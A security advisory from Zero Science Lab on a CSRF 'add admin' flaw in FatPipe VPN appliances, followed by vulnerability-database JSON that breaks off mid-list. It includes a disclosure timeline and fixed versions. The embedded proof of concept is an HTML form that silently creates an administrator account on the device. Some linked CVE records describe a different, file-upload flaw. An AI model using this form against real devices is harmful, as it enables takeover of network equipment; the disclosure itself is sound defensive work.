Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit
Advisory ID: [ZSL-2021-5681](<ZSL-2021-5681.php>)
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (4/5)
Release Date: 27.09.2021
##### Summary
FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail.
FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site.
FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware.
##### Description
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
##### Vendor
FatPipe Networks Inc. - <https://www.fatpipeinc.com>
##### Affected Version
WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
##### Tested On
Apache-Coyote/1.1
##### Vendor Status
[30.05.2016] Vulnerability discovered.
[25.07.2021] Vulnerability discovered.
[25.07.2021] Vendor contacted.
[27.07.2021] No response from the vendor.
[28.07.2021] Vendor contacted.
[06.08.2021] No response from the vendor.
[07.08.2021] Vendor contacted.
[09.08.2021] CISA contacted.
[09.08.2021] CISA asks for more details.
[09.08.2021] Sent details to CISA.
[10.08.2021] CISA asked if the vulnerabilities were previously reported and which contacts did ZSL used initially.
[10.08.2021] Replied to CISA.
[10.08.2021] CISA will reach out to the vendor.
[16.08.2021] Asked CISA for status update.
[17.08.2021] CISA responds that the vendor replied and is reviewing the information.
[17.08.2021] CISA responds, vendor pushed updates to address the reported issues.
[17.08.2021] Replied to CISA, asked for patch release plan and coordination of advisory release.
[18.08.2021] Working with CISA and FatPipe.
[20.08.2021] Vendor released advisory: https://www.fatpipeinc.com/support/advisories.php
[23.08.2021] Working with the vendor.
[24.08.2021] Sent draft advisories to vendor. Asked for fixed version number. Informed that the advisories will be released mid September.
[25.08.2021] Asked vendor for confirmation of PoCs receipt.
[30.08.2021] Further discussion with the vendor about the vulnerabilities.
[07.09.2021] Asked vendor for status update.
[10.09.2021] Vendor requests more details.
[10.09.2021] Provided further details to the vendor.
[14.09.2021] Informed the vendor that advisories will be released 27th September.
[19.09.2021] Informed CISA about our release plan.
[27.09.2021] Coordinated public security advisory released.
[27.09.2021] Vendor provides fixed versions 10.1.2r60p92 and 10.2.2r43, and for 9.1.2: 9.1.2r161p31 and 9.1.2r180p9.
##### PoC
[fatpipe_csrf.html](<../../codes/fatpipe_csrf.txt>)
##### Credits
Vulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>
##### References
[1] <https://www.fatpipeinc.com/support/advisories.php>
[2] <https://www.exploit-db.com/exploits/50338>
[3] <https://packetstormsecurity.com/files/164319/>
[4] <https://cxsecurity.com/issue/WLB-2021090149>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/210325>
[6] <https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/2791320/nsa-cisa-release-guidance-on-selecting-and-hardening-remote-access-vpns/>
[7] <https://www.fatpipeinc.com/support/cve-list.php>
[8] <https://thehackernews.com/2021/11/fbi-issues-flash-alert-on-actively.html>
[9] <https://www.ic3.gov/Media/News/2021/211117-2.pdf>
[10] <https://threatpost.com/fbi-fatpipe-vpn-zero-day-exploited-apt/176453/>
[11] <https://cisomag.eccouncil.org/fatpipe-mpvpn-zero-day-vulnerability-exploited/>
[12] <https://www.securityweek.com/fbi-warns-actively-exploited-fatpipe-zero-day-vulnerability>
[13] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27860>
[14] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27859>
[15] <https://www.fatpipeinc.com/fpsa/fpsa005.php>
##### Changelog
[27.09.2021] - Initial release
[30.09.2021] - Added reference [2], [3], [4], [5] and [6]
[21.11.2021] - Added reference [7], [8], [9], [10], [11] and [12]
[14.12.2021] - Added reference [13]
[11.01.2022] - Added reference [14]
[01.02.2022] - Added reference [15]
##### Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)
{"id": "ZSL-2021-5681", "vendorId": null, "type": "zeroscience", "bulletinFamily": "exploit", "title": "FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit", "description": "Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit \nAdvisory ID: [ZSL-2021-5681](<ZSL-2021-5681.php>) \nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (4/5) \nRelease Date: 27.09.2021 \n\n\n##### Summary\n\nFatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. \n \nFatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site. \n \nFatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware. \n\n##### Description\n\nThe application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. \n\n##### Vendor\n\nFatPipe Networks Inc. - <https://www.fatpipeinc.com>\n\n##### Affected Version\n\nWARP / IPVPN / MPVPN \n10.2.2r38 \n10.2.2r25 \n10.2.2r10 \n10.1.2r60p82 \n10.1.2r60p71 \n10.1.2r60p65 \n10.1.2r60p58s1 \n10.1.2r60p58 \n10.1.2r60p55 \n10.1.2r60p45 \n10.1.2r60p35 \n10.1.2r60p32 \n10.1.2r60p13 \n10.1.2r60p10 \n9.1.2r185 \n9.1.2r180p2 \n9.1.2r165 \n9.1.2r164p5 \n9.1.2r164p4 \n9.1.2r164 \n9.1.2r161p26 \n9.1.2r161p20 \n9.1.2r161p17 \n9.1.2r161p16 \n9.1.2r161p12 \n9.1.2r161p3 \n9.1.2r161p2 \n9.1.2r156 \n9.1.2r150 \n9.1.2r144 \n9.1.2r129 \n7.1.2r39 \n6.1.2r70p75-m \n6.1.2r70p45-m \n6.1.2r70p26 \n5.2.0r34 \n\n##### Tested On\n\nApache-Coyote/1.1 \n\n##### Vendor Status\n\n[30.05.2016] Vulnerability discovered. \n[25.07.2021] Vulnerability discovered. \n[25.07.2021] Vendor contacted. \n[27.07.2021] No response from the vendor. \n[28.07.2021] Vendor contacted. \n[06.08.2021] No response from the vendor. \n[07.08.2021] Vendor contacted. \n[09.08.2021] CISA contacted. \n[09.08.2021] CISA asks for more details. \n[09.08.2021] Sent details to CISA. \n[10.08.2021] CISA asked if the vulnerabilities were previously reported and which contacts did ZSL used initially. \n[10.08.2021] Replied to CISA. \n[10.08.2021] CISA will reach out to the vendor. \n[16.08.2021] Asked CISA for status update. \n[17.08.2021] CISA responds that the vendor replied and is reviewing the information. \n[17.08.2021] CISA responds, vendor pushed updates to address the reported issues. \n[17.08.2021] Replied to CISA, asked for patch release plan and coordination of advisory release. \n[18.08.2021] Working with CISA and FatPipe. \n[20.08.2021] Vendor released advisory: https://www.fatpipeinc.com/support/advisories.php \n[23.08.2021] Working with the vendor. \n[24.08.2021] Sent draft advisories to vendor. Asked for fixed version number. Informed that the advisories will be released mid September. \n[25.08.2021] Asked vendor for confirmation of PoCs receipt. \n[30.08.2021] Further discussion with the vendor about the vulnerabilities. \n[07.09.2021] Asked vendor for status update. \n[10.09.2021] Vendor requests more details. \n[10.09.2021] Provided further details to the vendor. \n[14.09.2021] Informed the vendor that advisories will be released 27th September. \n[19.09.2021] Informed CISA about our release plan. \n[27.09.2021] Coordinated public security advisory released. \n[27.09.2021] Vendor provides fixed versions 10.1.2r60p92 and 10.2.2r43, and for 9.1.2: 9.1.2r161p31 and 9.1.2r180p9. \n\n##### PoC\n\n[fatpipe_csrf.html](<../../codes/fatpipe_csrf.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.fatpipeinc.com/support/advisories.php> \n[2] <https://www.exploit-db.com/exploits/50338> \n[3] <https://packetstormsecurity.com/files/164319/> \n[4] <https://cxsecurity.com/issue/WLB-2021090149> \n[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/210325> \n[6] <https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/2791320/nsa-cisa-release-guidance-on-selecting-and-hardening-remote-access-vpns/> \n[7] <https://www.fatpipeinc.com/support/cve-list.php> \n[8] <https://thehackernews.com/2021/11/fbi-issues-flash-alert-on-actively.html> \n[9] <https://www.ic3.gov/Media/News/2021/211117-2.pdf> \n[10] <https://threatpost.com/fbi-fatpipe-vpn-zero-day-exploited-apt/176453/> \n[11] <https://cisomag.eccouncil.org/fatpipe-mpvpn-zero-day-vulnerability-exploited/> \n[12] <https://www.securityweek.com/fbi-warns-actively-exploited-fatpipe-zero-day-vulnerability> \n[13] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27860> \n[14] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27859> \n[15] <https://www.fatpipeinc.com/fpsa/fpsa005.php>\n\n##### Changelog\n\n[27.09.2021] - Initial release \n[30.09.2021] - Added reference [2], [3], [4], [5] and [6] \n[21.11.2021] - Added reference [7], [8], [9], [10], [11] and [12] \n[14.12.2021] - Added reference [13] \n[11.01.2022] - Added reference [14] \n[01.02.2022] - Added reference [15] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <https://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "published": "2021-09-27T00:00:00", "modified": "2021-09-27T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php", "reporter": "Gjoko Krstic", "references": [], "cvelist": ["CVE-2021-27860"], "immutableFields": [], "lastseen": "2022-02-10T00:00:00", "viewCount": 100, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:E13235D6-46D9-4F7D-B122-0B0B656804B0"]}, {"type": "cisa", "idList": ["CISA:99DAB57F9B8063F8619B1A418B014DF1"]}, {"type": "cve", "idList": ["CVE-2021-27860"]}]}, "score": {"value": 5.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:E13235D6-46D9-4F7D-B122-0B0B656804B0"]}, {"type": "cisa", "idList": ["CISA:99DAB57F9B8063F8619B1A418B014DF1"]}, {"type": "cve", "idList": ["CVE-2021-27860"]}, {"type": "nessus", "idList": ["OPENSUSE-2017-662.NASL", "SUSE_SU-2017-1445-1.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:3B05FD25F1EFE431C23369F5790520EB"]}]}, "exploitation": null, "vulnersScore": 5.4}, "sourceHref": "http://zeroscience.mk/codes/fatpipe_csrf.txt", "sourceData": "<!--\r\n\r\nFatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit\r\n\r\n\r\nVendor: FatPipe Networks Inc.\r\nProduct web page: https://www.fatpipeinc.com\r\nAffected version: WARP / IPVPN / MPVPN\r\n 10.2.2r38\r\n 10.2.2r25\r\n 10.2.2r10\r\n 10.1.2r60p82\r\n 10.1.2r60p71\r\n 10.1.2r60p65\r\n 10.1.2r60p58s1\r\n 10.1.2r60p58\r\n 10.1.2r60p55\r\n 10.1.2r60p45\r\n 10.1.2r60p35\r\n 10.1.2r60p32\r\n 10.1.2r60p13\r\n 10.1.2r60p10\r\n 9.1.2r185\r\n 9.1.2r180p2\r\n 9.1.2r165\r\n 9.1.2r164p5\r\n 9.1.2r164p4\r\n 9.1.2r164\r\n 9.1.2r161p26\r\n 9.1.2r161p20\r\n 9.1.2r161p17\r\n 9.1.2r161p16\r\n 9.1.2r161p12\r\n 9.1.2r161p3\r\n 9.1.2r161p2\r\n 9.1.2r156\r\n 9.1.2r150\r\n 9.1.2r144\r\n 9.1.2r129\r\n 7.1.2r39\r\n 6.1.2r70p75-m\r\n 6.1.2r70p45-m\r\n 6.1.2r70p26\r\n 5.2.0r34\r\n\r\nSummary: FatPipe Networks invented the concept of router-clustering,\r\nwhich provides the highest level of reliability, redundancy, and speed\r\nof Internet traffic for Business Continuity and communications. FatPipe\r\nWARP achieves fault tolerance for companies by creating an easy method\r\nof combining two or more Internet connections of any kind over multiple\r\nISPs. FatPipe utilizes all paths when the lines are up and running,\r\ndynamically balancing traffic over the multiple lines, and intelligently\r\nfailing over inbound and outbound IP traffic when ISP services and/or\r\ncomponents fail.\r\n\r\nFatPipe IPVPN balances load and provides reliability among multiple\r\nmanaged and CPE based VPNs as well as dedicated private networks. FatPipe\r\nIPVPN can also provide you an easy low-cost migration path from private\r\nline, Frame or Point-to-Point networks. You can aggregate multiple private,\r\nMPLS and public networks without additional equipment at the provider's\r\nsite.\r\n\r\nFatPipe MPVPN, a patented router clustering device, is an essential part\r\nof Disaster Recovery and Business Continuity Planning for Virtual Private\r\nNetwork (VPN) connectivity. It makes any VPN up to 900% more secure and\r\n300% times more reliable, redundant and faster. MPVPN can take WANs with\r\nan uptime of 99.5% or less and make them 99.999988% or higher, providing\r\na virtually infallible WAN. MPVPN dynamically balances load over multiple\r\nlines and ISPs without the need for BGP programming. MPVPN aggregates up\r\nto 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed\r\nyou need to keep your VPN up and running despite failures of service, line,\r\nsoftware, or hardware.\r\n\r\nDesc: The application interface allows users to perform certain actions via\r\nHTTP requests without performing any validity checks to verify the requests.\r\nThis can be exploited to perform certain actions with administrative privileges\r\nif a logged-in user visits a malicious web site.\r\n\r\nTested on: Apache-Coyote/1.1\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2021-5681\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php\r\n\r\n\r\n30.05.2016\r\n25.07.2021\r\n\r\n--><html>\n<body>\n<form action=\"https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest\" method=\"POST\">\n<input name=\"userList\" type=\"hidden\" value='[{\"userName\":\"adminz\",\"privilege\":\"1\",\"password\":\"TestPwd17\",\"action\":\"add\",\"state\":false}]'/>\n<input type=\"submit\" value=\"Submit\"/>\n</form>\n</body>\n</html>\n", "impact": "Cross-Site Scripting", "exploit_type": "Local/Remote", "_state": {"dependencies": 1647589307, "score": 0}}
{"attackerkb": [{"lastseen": "2022-06-16T23:00:46", "description": "A vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p92 and 10.2.2r44p1 allows a remote, unauthenticated attacker to upload a file to any location on the filesystem. The FatPipe advisory identifier for this vulnerability is FPSA006.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-27860", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27860"], "modified": "2022-01-10T00:00:00", "id": "AKB:E13235D6-46D9-4F7D-B122-0B0B656804B0", "href": "https://attackerkb.com/topics/jB2LhDJCbf/cve-2021-27860", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-03-30T14:44:14", "description": "An unrestricted file upload vulnerability exists in FatPipe Multiple Products. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-30T00:00:00", "type": "checkpoint_advisories", "title": "FatPipe Multiple Products Unrestricted File Upload (CVE-2021-27860)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27860"], "modified": "2022-03-30T00:00:00", "id": "CPAI-2021-1112", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-04-06T15:27:00", "description": "A vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p92 and 10.2.2r44p1 allows a remote, unauthenticated attacker to upload a file to any location on the filesystem. The FatPipe advisory identifier for this vulnerability is FPSA006.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-08T17:15:00", "type": "cve", "title": "CVE-2021-27860", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27860"], "modified": "2022-04-06T13:13:00", "cpe": ["cpe:/o:fatpipeinc:ipvpn_firmware:10.1.2", "cpe:/o:fatpipeinc:mpvpn_firmware:10.1.2", "cpe:/o:fatpipeinc:mpvpn_firmware:9.1.2", "cpe:/o:fatpipeinc:ipvpn_firmware:6.1.2", "cpe:/o:fatpipeinc:warp_firmware:7.1.2", "cpe:/o:fatpipeinc:ipvpn_firmware:7.1.2", "cpe:/o:fatpipeinc:warp_firmware:6.1.2", "cpe:/o:fatpipeinc:warp_firmware:10.2.2", "cpe:/o:fatpipeinc:mpvpn_firmware:6.1.2", "cpe:/o:fatpipeinc:mpvpn_firmware:7.1.2", "cpe:/o:fatpipeinc:warp_firmware:9.1.2", "cpe:/o:fatpipeinc:mpvpn_firmware:5.2.0", "cpe:/o:fatpipeinc:ipvpn_firmware:5.2.0", "cpe:/o:fatpipeinc:ipvpn_firmware:10.2.2", "cpe:/o:fatpipeinc:warp_firmware:10.1.2", "cpe:/o:fatpipeinc:ipvpn_firmware:9.1.2", "cpe:/o:fatpipeinc:mpvpn_firmware:10.2.2", "cpe:/o:fatpipeinc:warp_firmware:5.2.0"], "id": "CVE-2021-27860", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27860", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r161p20:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.2.2:r25:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r161p12:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r129:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p58s1:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:5.2.0:r34:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p10:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r165:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:6.1.2:r70p45-m:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p58:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r156:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p82:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r161p26:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r144:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.2.2:r38:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r164p4:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.2.2:r25:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p71:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p2:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p45:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p82:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r129:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r185:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p58:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:6.1.2:r70p45-m:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p71:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p45:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:5.2.0:r34:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p65:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p13:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p55:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r150:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r164p4:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:6.1.2:r70p26:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r161p16:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r185:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r161p3:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r144:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r164p4:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.2.2:r38:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:6.1.2:r70p26:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p20:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p65:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.2.2:r25:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p35:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p71:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:10.1.2:r60p35:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:10.1.2:r60p13:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:mpvpn_firmware:9.1.2:r161p2:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p32:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p16:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p58:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:9.1.2:r161p17:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:ipvpn_firmware:10.1.2:r60p82:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:9.1.2:r180p2:*:*:*:*:*:*", "cpe:2.3:o:fatpipeinc:warp_firmware:6.1.2:r70p75-m:*:*:*:*:*:*", 